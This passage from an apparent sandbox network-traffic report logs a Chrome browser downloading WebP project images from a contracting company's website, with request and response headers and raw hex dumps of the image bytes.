                                              2024-09-27 06:20:16 UTC8000INData Raw: cd 4d df 49 94 7a 8d b6 b7 bf d1 3f 67 74 b0 ea f5 e0 59 0e b4 28 3d 5c 2c ce fa 15 6c c0 52 08 ed 11 2a b2 2c b5 90 bc 93 cb 56 b3 74 ef 48 7d 58 da de 17 60 12 55 65 2d d7 e4 25 1a 83 35 48 6d c0 19 e3 3b d8 11 04 98 45 9d 53 32 eb ef 94 8f 38 00 31 3f 8c b1 60 6c 11 2b 20 c9 4c c4 59 ac b1 97 4e 9c 17 1f bc df b8 c2 df 31 77 af b6 e3 d0 b0 46 c8 b8 bf be 9d 7c ae 60 61 a1 0d 56 c6 2b bb f1 66 4f 8e 41 2f 06 73 80 4b 68 a1 76 66 df 05 57 9f d4 dc 7f 15 3d 48 57 f8 7f 5b 47 4b 22 73 2f 40 9f da 94 e6 00 75 ce 88 8b e9 11 f3 a4 64 e1 a0 a2 f6 90 18 53 3c 19 87 62 0f 90 27 9f 2f 71 ce 6a 8a 29 a6 73 0a 60 12 21 9e 83 b5 15 c8 3e 8a 95 43 74 c0 ab 37 d6 32 69 c6 58 67 78 4f 19 c2 a4 72 c4 70 fd ed 8c 91 dc 03 25 38 0a a7 1b 38 65 6c 2d d6 cf 2b 56 5e 52 1f
                                              Data Ascii: MIz?gtY(=\,lR*,VtH}X`Ue-%5Hm;ES281?`l+ LYN1wF|`aV+fOA/sKhvfW=HW[GK"s/@udS<b'/qj)s`!>Ct72iXgxOrp%88el-+V^R
                                              2024-09-27 06:20:16 UTC8000INData Raw: 6e 72 10 fc 00 0f bf 3b e6 ae df c7 dd 2a c6 c6 d1 59 37 8c 62 30 c9 bd 62 2b 44 63 6c 61 f0 b2 b2 10 18 ec 82 28 2d ae 0b fc 7c 4d 95 84 66 1e 1a 77 c0 bb 2c 9e b1 84 7d 9a df 55 fa ac 51 c2 cf ac b8 49 a2 ab 35 bc 32 44 2e e0 c0 49 2d a4 31 29 45 fa f8 ef ce 3a bf 4c 14 6c e8 5d ed 85 c5 23 8d 78 6f 8c 3b fd 12 cd a7 02 76 b0 aa cd 90 c2 34 96 ce 58 a6 ad 22 9c 08 71 fe 81 3e ce 6f 28 a6 1d a1 2d 0a 12 5c 03 2a f8 30 93 00 bd 29 62 59 e0 22 d0 85 b3 28 43 84 d5 7e 3c f7 99 cb f0 15 96 f2 76 8a cb 6f 83 0b 09 6f 55 93 4f cf 98 68 74 29 ce 63 53 e3 53 71 fc 5c d4 36 17 d2 bb 3d f6 6a 99 6e 9d 52 e4 da 1f cc 92 d2 d5 b1 e6 5d a2 f0 12 0b 99 48 07 85 7d 62 de d7 a0 65 4b 2f 61 5d 0e 3f b3 fb b1 11 af c7 4d 82 71 49 11 d0 c5 9b ab 5c 05 d0 c2 90 d6 0c 83 9f
                                              Data Ascii: nr;*Y7b0b+Dcla(-|Mfw,}UQI52D.I-1)E:Ll]#xo;v4X"q>o(-\*0)bY"(C~<vooUOht)cSSq\6=jnR]H}beK/a]?MqI\
                                              2024-09-27 06:20:16 UTC8000INData Raw: d6 66 d9 47 7d 3d 4a e5 d5 e9 62 f4 da a2 ca a1 70 fd 29 69 a8 4c 60 01 ec 05 d4 ba db df d2 bb 73 30 06 e4 3c 59 93 23 a8 4b 44 f1 86 63 02 a8 9d 9a 35 33 c9 77 7b 64 2b dd fc f3 aa 7e 1d 23 ac d8 3a 5f 53 2c b9 c8 10 f6 ec be 1a 60 42 de 47 0b 89 c2 05 ef 59 f2 0e e8 47 86 58 c5 ef 58 4e 89 1b f2 93 6a 5c 5a 3d 0c 3a 1b d2 d0 73 83 b9 81 65 e1 64 76 4f a6 db b8 c6 fc 01 dd c4 85 4a ca c8 b4 98 64 7e 83 f3 9a 12 9f 33 ca 0b 52 36 43 66 4a 22 89 7b 3d 22 80 85 0b cb 10 06 65 b8 ba f3 c7 f2 07 2a eb 1f 2b 03 c7 de f3 2d f4 18 b0 8e e1 55 f1 61 b4 ca dc f8 35 7e 2d 8f db 67 8d a5 13 60 3e d7 6d 71 80 36 c2 2c aa 6f c6 85 a1 aa a8 0e 59 cb cc fd 5f 50 1a 41 55 bf a7 76 ea f4 9f f2 84 bd 89 83 39 d7 31 d7 10 74 fc 82 be 45 b6 46 51 d3 3b 91 30 60 ce 83 75 54
                                              Data Ascii: fG}=Jbp)iL`s0<Y#KDc53w{d+~#:_S,`BGYGXXNj\Z=:sedvOJd~3R6CfJ"{="e*+-Ua5~-g`>mq6,oY_PAUv91tEFQ;0`uT
                                              2024-09-27 06:20:16 UTC8000INData Raw: 9e 55 62 02 4f 8b e3 1a 22 24 ad 4c 4f ae f7 34 1e 34 89 e8 7b c2 7b 5f f6 f6 f3 bd 47 a7 1e ac 21 91 c3 e9 d8 26 70 84 e9 19 81 87 d5 24 30 17 cf 63 b5 0f 82 df 43 e6 92 02 b1 a6 a8 2f c9 43 40 68 9b d7 03 35 b6 a4 0a 49 be f2 5a 3b 23 54 bb 58 1a a3 16 0b 34 fd db c9 34 cf e6 eb 81 e8 62 cf 8f d0 37 99 75 cf 4d 42 e9 4d c4 61 bb d4 78 89 0b f5 af ea c1 99 ea ac df 6f 31 41 b1 97 00 90 f8 f9 75 57 0f c3 92 08 6e 89 5e 35 b7 7a 2d 61 6f 3b 8b ca a7 50 69 d9 0b 73 86 59 56 41 59 1b b5 45 be 9a 72 45 c1 24 99 d5 bb 98 c5 e4 65 d9 fe a2 75 83 28 f9 4e 2e 26 87 05 dc ef 3f ab 1d f5 ea 85 53 7f 81 77 fa 63 d0 44 34 8a 5b 07 ee db cd 84 f2 0a 83 4f 67 e2 83 31 30 ec dd 12 ef 88 77 01 a7 43 2a e5 b1 5c 2a 2c 05 dc cd 13 dc 3c 63 a1 f9 eb 22 32 22 2c 80 87 3d c9
                                              Data Ascii: UbO"$LO44{{_G!&p$0cC/C@h5IZ;#TX44b7uMBMaxo1AuWn^5z-ao;PisYVAYErE$eu(N.&?SwcD4[Og10wC*\*,<c"2",=
                                              2024-09-27 06:20:16 UTC8000INData Raw: 55 93 1e aa cb 95 7e ea f6 9d 1e 1e a7 c3 e9 c2 66 08 dd 86 1c dc f9 92 6b 3c 83 53 cd cc d7 80 20 e2 bc 4c c8 69 a0 bf 1e 00 1f bd f1 4e 05 8f eb 47 32 75 ce 8b 60 1d 1c 34 88 0c 2e c9 cb 3d e5 c1 07 4d 3b 7c a9 b6 bf 61 1b 7c 62 c7 60 45 4d 96 08 94 ae 7f 67 a2 40 4c 70 28 be 9d 31 eb 84 e4 5b 54 2f b8 de 8e 52 13 30 04 d5 c5 23 d1 cc f0 25 f0 37 99 26 4f f4 d5 32 91 0f df 60 ba 20 10 af e3 dd 61 7c 94 e6 16 38 f1 4c 6e 81 d2 7f c8 23 15 bf 11 11 a9 8b d6 f8 de 02 70 73 42 34 63 66 62 16 3a 23 b7 61 73 ca b9 c5 e5 e3 96 c7 6e af f4 8f 6c 08 b6 6b 2c 32 49 cd a0 d1 63 f9 43 e2 78 a2 5d 7a 91 d4 d1 91 44 70 9a 48 a0 f3 68 77 5a 4e 99 1b 2f 7f bd c2 67 e3 29 f9 63 f3 c0 ef 48 33 11 b1 65 d2 ec 4c 08 81 c6 bf 2e 87 9d a9 45 b8 25 02 a1 1e 36 13 99 88 1e 8c
                                              Data Ascii: U~fk<S LiNG2u`4.=M;|a|b`EMg@Lp(1[T/R0#%7&O2` a|8Ln#psB4cfb:#asnlk,2IcCx]zDpHhwZN/g)cH3eL.E%6
                                              2024-09-27 06:20:16 UTC8000INData Raw: eb c2 32 6c 58 83 27 84 7f 24 3c c6 be fd 18 bf 86 07 a8 38 d7 27 3f d4 7c f8 5e 34 96 37 e4 93 87 6c 5f fa 36 61 2b 31 8e d4 13 6a eb a0 61 e7 33 b9 1e 48 3c bf a6 55 66 df 97 f3 88 25 d8 5f a4 38 de 38 1f 69 35 bd 95 e4 39 0c 88 1f c8 3b 53 31 af 6f 83 77 f4 ff a5 b8 e7 7f b9 32 3a 64 a9 ba 27 69 12 ad 70 82 89 53 01 e5 1f 1f 48 69 2b 63 25 a4 82 78 a0 44 0f cb 55 30 e4 29 9b 63 6e 8e 38 b1 ae af 5c 0a 65 bd 1d 73 1a a0 f2 73 2f b9 eb c2 d2 88 bb 8e 7b c6 16 f5 87 c1 4f 7a 11 df 9c 64 5a 0b dc cf 21 01 68 03 a9 47 48 34 53 d6 03 b7 e7 65 4e 07 8e fe 40 91 46 b2 31 ab d0 d0 34 41 97 9d b0 66 11 eb 30 47 fb ce d9 ee 1b 37 34 0e 27 55 40 84 4b 74 3c b9 1f b0 25 93 e3 d5 89 54 9e 80 7f 4a 5e b6 af b3 f0 2c 27 f7 81 48 95 6d 2b ea f6 71 23 b7 fa 6b 27 99 3c
                                              Data Ascii: 2lX'$<8'?|^47l_6a+1ja3H<Uf%_88i59;S1ow2:d'ipSHi+c%xDU0)cn8\ess/{OzdZ!hGH4SeN@F14Af0G74'U@Kt<%TJ^,'Hm+q#k'<
                                              2024-09-27 06:20:16 UTC8000INData Raw: a9 e4 9f 31 e9 d5 1c e0 9f e4 63 51 0f 68 a8 45 4f a6 f3 6e cf dd 1b a1 bc 6f 49 6f a0 ae 0e a3 ed c8 78 b0 b8 ab 65 91 4e bc 9c 3a b0 6e 58 1d d4 a2 c8 2e 1b e3 f1 a0 4c 86 e5 78 1e 9b 5a e1 2e 55 d3 2f 90 f5 f3 5b c4 10 41 30 29 f9 e7 3e 8c 3d 8e 84 b7 be 87 d2 fd b2 4a ef ce dc 4f 5c c9 4d 91 dd 23 ee 02 bc d1 13 ff 67 64 09 26 19 8f fb 8a 81 ad f6 f0 8d 62 52 5c 7a 69 23 7c 52 35 d1 cb b0 99 df cc 65 c5 ed 9b 2b eb 3f 31 d6 36 42 07 25 48 34 7d 2b e4 7f e8 89 e3 be 89 be ae ed 81 9a 84 fa ba b2 50 e4 ca 06 dc 47 7e b6 0b b3 ca 20 7c 50 7b 27 be 37 43 f8 3e 7b 80 a1 63 d4 14 e1 bf d7 4b 6a c6 24 a7 37 b9 a4 0e 0a 97 95 7e 36 dd 73 8d 68 6e 6f 1e 98 73 fa 6d 16 c0 d1 9e 3e 63 b3 48 38 21 ef fb d2 6e 25 46 f5 52 1c b6 06 95 53 9b bc d7 33 bf d8 ca 18 5a
                                              Data Ascii: 1cQhEOnoIoxeN:nX.LxZ.U/[A0)>=JO\M#gd&bR\zi#|R5e+?16B%H4}+PG~ |P{'7C>{cKj$7~6shnosm>cH8!n%FRS3Z
                                              2024-09-27 06:20:16 UTC4061INData Raw: f9 40 99 3b 3d 3d 1d 56 40 95 72 84 48 2c dd 95 28 c9 e6 d0 20 cb 5d 3b 68 e3 53 b0 14 9d 37 48 33 1e 94 05 77 a4 f3 96 6c 71 74 36 e8 2f e0 b2 f1 83 f1 7d 9b 8b 01 de b5 9a b2 c8 5e b6 3b 45 4c ef 65 06 5e a0 23 b7 b5 8c 09 96 67 6a d5 66 ac b6 d8 7e 68 6f c5 24 85 b8 5f d6 1e 6c 4c 85 b1 52 13 ba 08 e3 f6 96 aa 1b dd 9c 39 ca 7b e4 83 13 d7 74 db ef 61 c2 53 8d b2 ae ac 86 b0 dc 29 85 51 42 76 52 29 47 e5 de a4 91 17 25 1d 75 8c e3 e5 a4 09 30 45 c5 d5 50 27 a4 a2 c3 2d d3 a9 bd 71 28 14 25 55 87 86 9f 47 14 46 34 65 79 00 a2 ae ed d9 81 98 2f 0f 6b 0d db 89 22 05 13 52 fe 5c 3e 04 21 d9 4c 15 e8 2e 2d f7 9e 66 32 93 a4 81 a2 d0 8b e4 e1 7d 4f d6 93 8a 80 68 d8 6a e1 cc 26 c9 5b e2 68 24 34 60 49 72 6c 94 3d 25 91 f0 3b a2 85 89 f5 57 9a c7 8d a4 f6 ef
                                              Data Ascii: @;==V@rH,( ];hS7H3wlqt6/}^;ELe^#gjf~ho$_lLR9{taS)QBvR)G%u0EP'-q(%UGF4ey/k"R\>!L.-f2}Ohj&[h$4`Irl=%;W


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              91192.168.2.465427173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:16 UTC724OUTGET /uploads/projects/14/9c27c5ed5390bcab73619e4cc9ae7362.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:16 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:16 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 10:32:40 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 40342
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:16 UTC7931INData Raw: 52 49 46 46 8e 9d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 1a 9d 00 00 f0 fe 03 9d 01 2a cf 04 a3 03 3e e9 74 b2 53 29 26 a5 30 23 12 79 fa 00 1d 09 69 6d c4 dd 5d 1f 8d ff f3 40 ff cf ff ed 9e 5f 1f fe ac e4 1e 5b 96 57 fc 7c 7b 39 b8 fa 85 f8 f7 3b bf ff fd 40 e7 0a 6a e6 fa b9 bd 8a fc 27 fa 5f d5 f4 a7 bf bf e5 73 82 f8 13 37 fc 76 ba 70 ee 3a f1 a0 38 8a 23 7b f1 29 4f ff ad 8e a3 df 51 86 0d ff f4 7f f3 ff be 69 fd ab cb 57 d6 ff ca ff eb dd 2b f5 5f f7 7f ae f7 81 ff 93 3c 7f 81 ff af 8f 4f ec 19 fb ed 67 f6 4f ea f9 4b bf b3 bd eb 5f f3 29 f8 13 3b bf f1 f4 5f fc fd 93 bf ba f4 51 7f f7 e9 a3 ef 7f 4e 91 94 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                              Data Ascii: RIFFWEBPVP8XVP8 *>tS)&0#yim]@_[W|{9;@j'_s7vp:8#{)OQiW+_<OgOK_);_QN
                                              2024-09-27 06:20:16 UTC8000INData Raw: 71 b4 ac b2 d9 e0 3a 42 d2 50 ab c9 90 26 1f 3b e0 c2 8a 52 73 ca 39 63 6c a0 5e 05 0e e3 26 7e 19 1b 16 b8 cf b7 ff b9 ba 55 e9 9c 65 1c a0 04 73 b6 12 63 86 ac 0d c6 e5 08 5b e4 ad 3a 45 c8 44 52 b1 7c 46 30 f5 e1 26 0b 4b 98 59 4b ca ff f1 e0 86 dc 90 05 a4 e1 a4 7b 13 ba 8a c5 bc 80 c4 b2 f5 a0 f7 96 3d 57 a0 60 83 d2 0f e8 1f c1 be 3f b4 76 3b 13 bc 36 53 0e e6 90 57 d7 1f 5c 70 6d 63 dd 33 4f 8c a5 a7 ad d3 bb c6 24 0e 62 e9 89 43 b4 3e 73 c8 11 08 d2 4f d3 fe 5e 58 2d 9d eb ce 7e eb 54 c5 56 cb 8a 6d 43 6b 2a 8f 44 76 39 02 32 44 c1 e6 68 50 79 d2 85 ed d3 fc 31 3b e5 bd 2c 73 0b 03 d8 6b 4e 91 e1 54 4e 13 28 00 3d 78 aa bf 1b 13 bb d4 74 66 92 47 65 56 11 62 b2 51 a2 e1 af 96 d7 cb 98 95 9b ff 5a 1e 0d be 15 55 71 3b 61 9e 95 b7 24 63 f9 f8 24 84
                                              Data Ascii: q:BP&;Rs9cl^&~Uesc[:EDR|F0&KYK{=W`?v;6SW\pmc3O$bC>sO^X-~TVmCk*Dv92DhPy1;,skNTN(=xtfGeVbQZUq;a$c$
                                              2024-09-27 06:20:16 UTC8000INData Raw: 79 f3 be dd 63 48 f0 4a 30 44 e2 89 af b6 f3 00 b6 dd 1f a2 86 77 4f ec d1 ed b5 e1 9e 70 f5 22 d4 a0 8a 81 10 83 bc 7c 84 d4 8d 70 40 bf 47 5d f5 30 01 b7 5d 26 4a 0c c6 84 98 dc 2b 4a e4 c4 b5 94 f2 d9 df d8 56 91 f9 7a 38 76 4a de a0 d5 c9 4d 7b 02 42 c0 30 11 0b 43 f2 c7 d8 6c a4 c6 a8 5f 19 5e 60 3f 6c e4 10 b4 de 28 51 87 a7 60 8e d2 08 6d 94 fc 6c b3 8e f6 11 29 6f 06 42 76 cb 78 bd 23 bb d6 4b d5 ad a4 47 a3 5c a5 ed 7c 2b a5 68 02 fc 5a e1 40 4a 7e 4e 28 7b f5 ba 9c aa d4 e6 e8 d2 6c 68 e2 46 1b 4a db 7c ad 9c d8 5f 92 08 c0 c9 43 66 21 eb e7 05 fd 37 ac fe 06 2e 92 0f dd 8c 8a 49 62 94 35 f1 94 ab d6 4c 3d 8e d0 fb 92 24 7d 0e 58 80 4b d5 4d 3e 44 a9 c6 bc 46 c5 db 17 fd 33 c4 c8 61 1e a3 c8 ab 55 c8 34 ce dc d6 23 b5 a7 59 e5 e8 ae 4a f7 2f 42
                                              Data Ascii: ycHJ0DwOp"|p@G]0]&J+JVz8vJM{B0Cl_^`?l(Q`ml)oBvx#KG\|+hZ@J~N({lhFJ|_Cf!7.Ib5L=$}XKM>DF3aU4#YJ/B
                                              2024-09-27 06:20:16 UTC8000INData Raw: 08 09 49 07 20 ce 91 08 5b d4 67 80 b6 d4 d2 f5 a9 e9 88 43 98 24 bd e4 42 47 63 7e 29 ea 55 ae 7e 3b 96 7f c4 1f a7 51 71 6a 03 8b 16 b0 ac 65 b7 4e ec 4c 71 38 9f 51 b6 a1 9f 3d a8 12 ec 3c 34 57 41 f1 ee b2 d2 a9 77 3b 11 64 a7 a1 37 f6 fa f4 fa c9 75 97 55 a0 0c 83 45 57 30 17 0a 9d d7 bd 87 f5 75 c6 a1 ad f1 e7 94 dd f8 74 93 63 bf 40 25 0f c1 3d de 72 59 4d ea 83 5f eb b2 5b 16 b3 d1 83 90 2d 0f 41 ba 79 32 54 12 1c 2e ea 30 90 58 fe fa 2b 93 49 ca 10 39 56 43 d3 a4 cf 6f 46 2c 11 67 83 39 df ad d9 31 c3 26 0a a5 7d 50 52 fd c5 45 f6 25 f8 4b 81 d9 f3 2c e6 ed 62 b3 36 fb 99 99 00 07 24 2c 05 0e d9 96 17 89 57 2a 75 72 47 3a 9f 2c 90 05 24 32 2d b1 17 36 9d 8b d2 95 4b 12 f6 0c d1 87 a1 e9 a7 22 5b 97 09 8b 70 98 8c ee 9c 30 25 9d 26 76 4b 94 42 fe
                                              Data Ascii: I [gC$BGc~)U~;QqjeNLq8Q=<4WAw;d7uUEW0utc@%=rYM_[-Ay2T.0X+I9VCoF,g91&}PRE%K,b6$,W*urG:,$2-6K"[p0%&vKB
                                              2024-09-27 06:20:16 UTC8000INData Raw: 5d 14 36 e5 af 45 7c 91 a9 7c 79 f3 8a 02 ec 5b 56 e8 c0 2b 5d 66 a9 bb b7 71 74 af 35 f3 d3 bf 6d a0 b1 b1 a1 3b 9e 0f 28 de c7 d4 3f ca c9 88 3d 0e 36 ad b5 a3 d0 66 77 3a 8e 7c 65 ea 8c 20 cb 0e f6 7b 92 f1 aa ac 94 b4 18 0d 3e 14 5b e2 37 df 49 f0 fb 1e 74 6f c2 4e ad 80 f9 d2 36 89 63 da 16 b3 bb 37 e8 d7 7a 2f 36 64 d5 48 fd 2e 6a 98 2d 2f 68 3b b1 b6 7a e5 b2 bb a6 3b 90 88 b7 1d 75 73 4e fd 47 8d c0 f0 c5 81 c3 a4 98 c0 f9 c9 7d df cb e4 bb 27 09 4e f8 c5 df 31 78 8c 7c f4 04 2f e1 cb 58 71 ca 9b 32 a4 8f 73 8b b9 62 a4 dc 2a a1 3a 2d 93 41 94 52 07 14 c2 55 b1 1a 76 0f 37 22 91 20 fd 48 da ff 18 3d 1e 10 52 f2 b9 69 4e dd 48 ed 0c 40 49 8f f1 1a 2e 7e 46 ad 9b a5 e6 3f 60 99 39 5f 4b c1 93 eb d2 f6 3e 58 25 5b 1e 3a 02 cf e0 38 18 5e 5f 2a 15 ca
                                              Data Ascii: ]6E||y[V+]fqt5m;(?=6fw:|e {>[7ItoN6c7z/6dH.j-/h;z;usNG}'N1x|/Xq2sb*:-ARUv7" H=RiNH@I.~F?`9_K>X%[:8^_*
                                              2024-09-27 06:20:16 UTC411INData Raw: 8f c1 02 5c 89 6d 1a 0d 85 bc 64 07 b9 5a 88 85 31 49 21 9e 06 20 f3 08 bb d6 a0 7c e2 01 7d 1b 16 80 87 b1 b1 be 1a f6 d4 5e 82 4a c8 33 8d 4f d1 2a 43 a0 10 c8 9f ce b1 9c 0c 51 c9 9c a9 39 ad 32 03 85 ed c3 72 04 16 f9 4f 09 ed 12 1a ac 9d b8 10 b5 bd ad fe 5d 94 de 00 bb 52 cc 5f f0 20 29 77 ad 62 20 f7 b1 2b eb 11 19 4c 2b 6a 98 e3 98 e8 9d 56 d8 b2 d3 ca 45 79 4f 3e 74 90 3d 6f e4 56 8b 65 ff a9 28 43 d2 9b 32 20 01 d7 aa 54 88 75 4a cc 39 fc a5 37 22 d3 9f f0 09 04 72 8c 02 57 2f 40 41 75 ac 79 35 03 62 a3 8e 57 89 da 39 ed 19 4d 2b 48 87 c4 21 af 0e 53 68 4b 4e cc dd f9 be d1 88 d8 f7 6b 0c c1 7a 60 88 7b 48 09 da 92 e2 89 17 94 f4 75 e8 a2 d1 24 d3 53 1f 5e ed 37 90 ce 8d 01 5c 00 66 18 e4 51 5e 66 d8 00 e3 e3 b2 93 9e bd 01 10 75 58 45 a6 6b c2
                                              Data Ascii: \mdZ1I! |}^J3O*CQ92rO]R_ )wb +L+jVEyO>t=oVe(C2 TuJ97"rW/@Auy5bW9M+H!ShKNkz`{Hu$S^7\fQ^fuXEk


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              92192.168.2.465428173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:16 UTC723OUTGET /uploads/dynamic/12/e14e9190beffdec276a88b4d487cd9ab.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/projects
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:16 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:16 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 14:04:58 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 83836
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:16 UTC7931INData Raw: 52 49 46 46 74 47 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 00 47 01 00 50 5a 06 9d 01 2a cf 04 a3 03 3e e9 6c ad 51 a9 25 bf b6 a7 76 9a 73 f0 1d 09 62 6e 96 bc 3b 69 f7 fa 16 20 9e 83 db 97 35 c1 be 06 0c 17 37 79 71 fa 85 45 45 96 8a fd ff 89 d7 ac ff b0 e9 fd ff 73 c1 d5 03 3c c5 73 c5 fe c5 de cf 17 af fe a2 7b b5 f6 7f d5 7a 81 f1 ff 8c 7f 66 fc 67 af ef f9 7c a2 f9 af 29 4f 7b ef 79 ff 23 f6 ef de 7f ea df 61 bf ea 1f e8 7d 4e ff e9 fd d5 f7 f3 fd eb ff 17 e5 1f c2 7f ea bf f3 7f 79 bd ed fd 3a ff a1 f5 28 fe d3 e9 e7 eb 21 e8 eb e7 39 ff e3 f7 a7 e2 63 fb af ff 3e a0 0f ff fe dd fd 0d fe 3d ff bb cf 87 d0 3f c3 ff e5 fe f7 c9 1f d1 bb 0a b1 0f f5 de 0c 7f 65 f9 e7 eb 57 fc ff 06 ff 56 fe 8b d0 83 cd de 98
                                              Data Ascii: RIFFtGWEBPVP8XVP8 GPZ*>lQ%vsbn;i 57yqEEs<s{zfg|)O{y#a}Ny:(!9c>=?eWV
                                              2024-09-27 06:20:16 UTC8000INData Raw: 7d a8 57 b3 92 c2 5e a2 78 47 43 db bb 91 11 02 1a 6f 32 59 15 94 1c 38 c0 85 6d 0a 2a 07 ab 6b b4 cf 71 72 04 72 12 ba a2 fb 98 5c 51 3e cf fc 91 ff 05 99 7d 3d ad 41 89 f1 42 51 8f 19 ee 22 4b df 6a ae 84 37 04 20 43 69 94 92 83 fe ad e5 8d 41 31 af 22 8c 50 18 81 f8 3f 5e e3 e4 ad 1c 4e 60 b3 b0 7b 26 98 f7 26 2c ba 2b 29 e3 ae db 82 fe c9 5d 83 8a 0c 32 9e 85 ab 43 15 b2 1a 6b 46 06 c0 81 e0 42 2e 5c 6b ed 83 74 43 de 93 48 8e 11 48 c9 c0 2c d6 5d 36 24 e1 dc 0a 16 9d a7 9b 28 5e 94 42 29 12 df 32 29 9a 95 d7 c4 c0 6a dc af ca 00 e7 1b 1e 7e 78 50 2f da c8 c1 cd 93 86 a7 04 8c 17 aa 7d 77 84 ca 0a 73 95 79 e4 84 da 13 22 a4 46 4e d1 7b 7a 8c 37 54 b6 98 5c 5b 14 91 1f 6d ee 9a 48 0e 1d 9f 5f 71 70 78 98 1d f5 db 2c 00 f9 a5 d3 df 6b 6e c4 3c ee 39 d2
                                              Data Ascii: }W^xGCo2Y8m*kqrr\Q>}=ABQ"Kj7 CiA1"P?^N`{&&,+)]2CkFB.\ktCHH,]6$(^B)2)j~xP/}wsy"FN{z7T\[mH_qpx,kn<9
                                              2024-09-27 06:20:16 UTC8000INData Raw: 87 36 14 ee e0 3e 0b 51 d0 f9 77 b9 46 fb ba 29 21 25 2d 11 71 3a a5 86 00 9e 0e fe a7 d0 ed 62 20 fe 44 79 c4 e7 15 1b e2 44 97 cf 24 5f 20 f2 0c 95 a7 62 f1 55 ec 31 b1 40 34 3f b2 a6 4c 37 82 53 98 dc 61 22 1b e8 7e 59 8b e4 a9 60 db d1 74 ea 17 d6 39 39 9c 25 de ef 34 5d e3 44 74 ee 86 3e 26 53 b2 da ae 8f 87 35 e3 29 ac 19 2a f8 20 e3 38 52 85 fe 9b cb f5 e9 83 fb f4 70 62 4a 0a 7b 56 43 43 f3 47 38 42 4c a7 1b 25 fb d6 07 ad a0 fe 93 cb b0 c1 b8 ad 45 e4 d7 94 5f b4 e4 5e c3 e8 b7 1c e9 71 5e a6 d4 19 45 54 9a 00 2e f9 aa f2 ad bb 3f 8b 6f 40 23 94 8f 27 45 98 e9 3e 34 ae 19 c1 09 9a e5 ab 90 d9 e0 6c aa 57 92 d7 fa 33 92 af 0d f9 ef f7 3f cc b2 50 c1 a0 42 56 ba fa 82 66 79 79 be 84 33 50 b2 ca 45 0c e3 c3 b5 b9 1e 9f f7 ef 7f da 3f 0e f1 de 60 d6
                                              Data Ascii: 6>QwF)!%-q:b DyD$_ bU1@4?L7Sa"~Y`t99%4]Dt>&S5)* 8RpbJ{VCCG8BL%E_^q^ET.?o@#'E>4lW3?PBVfyy3PE?`
                                              2024-09-27 06:20:16 UTC8000INData Raw: 72 dd 08 74 92 b7 a2 84 93 e0 43 43 ef 20 fe 82 33 02 94 21 db cf d8 24 5e cc 0c 17 87 5f c6 f1 6e 20 af 7e 55 ae f9 fe c5 15 9c 3f d4 1f 16 90 2c 8e cc 7f 25 38 eb 0f 55 ac 40 0c 1d 67 37 46 12 aa fc d5 a4 9e d1 17 ad 2f c9 00 2b d1 c3 19 25 b6 68 82 73 a7 f6 5c 95 19 b3 78 e9 23 b5 75 14 80 5c a8 6e f1 d0 37 a7 45 b7 24 d1 c6 00 61 49 80 27 e3 bc 2b 5b bf ce b1 d2 9f bb 5a e6 b9 32 cd c9 15 d6 8b 17 5a 39 b5 e7 ed 95 38 73 91 84 51 fc d8 3d d1 c8 21 f8 8d 7e a3 8c f8 c9 1e d2 42 80 1d d8 3f 40 9f ac 26 4c a0 fd 5a 05 00 e2 84 81 d6 08 2e b0 e9 fa d6 15 3c eb e6 2d 74 14 b0 39 52 42 c0 75 48 25 49 ab 3a 92 6b 2d 95 64 a2 c5 58 90 16 f3 0d f5 21 f5 e3 4f 2b 19 70 11 73 e3 fc cc f8 2d f1 75 77 d0 c8 ea 8a bc e3 0e 2f 5f 12 c8 82 05 f3 d8 c0 68 9a 86 16 bc
